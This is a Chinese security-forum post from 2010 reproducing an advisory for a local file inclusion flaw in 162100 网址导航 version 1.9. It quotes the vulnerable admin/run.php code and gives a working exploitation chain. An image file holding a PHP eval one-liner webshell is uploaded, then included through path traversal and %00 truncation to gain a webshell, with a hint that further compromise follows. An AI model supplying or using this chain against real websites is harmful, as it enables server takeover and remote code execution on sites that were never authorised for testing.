Board logo

标题: 162100网址导航1.9本地文件包含漏洞 [打印本页]

作者: 晓谛    时间: 2010-11-6 18:31     标题: 162100网址导航1.9本地文件包含漏洞

162100网址导航1.9本地文件包含漏洞
发布日期:2010-10.27
发布作者:陆羽

影响版本:162100网址导航1.9
官方地址:www.162100.com

漏洞类型:文件包含
漏洞描述:162100网址导航系统1.9存在本地文件包含漏洞,利用上传功能,上传图片木马可执行脚本获取网站webshell.

漏洞分析:admin 目录下 run.php 文件部分代码如下:

<?php      if($_REQUEST['run'] && file_exists('./run/'.$_REQUEST['run'].'.php'))        require_once('./run/'.$_REQUEST['run'].'.php'); //这里判断只要文件存在,就可以包含,未做任何限制,可目录跳转,所以,只要能上传文件,然后%00截断,即可上传      else       alert('命令错误或功能尚未开通!','./index.html');      ?>     我找到上传目录

editor/index.html

使用上传图片功能,上传一个1.jpg 内容为 <?php eval($_POST[cmd])?>

获得地址editor/images/upload/2010102718265325.jpg

然后admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00

就是一个一句话了。。。剩下的你懂的。。。

我就传一个phpinfo示意下吧。。。





欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2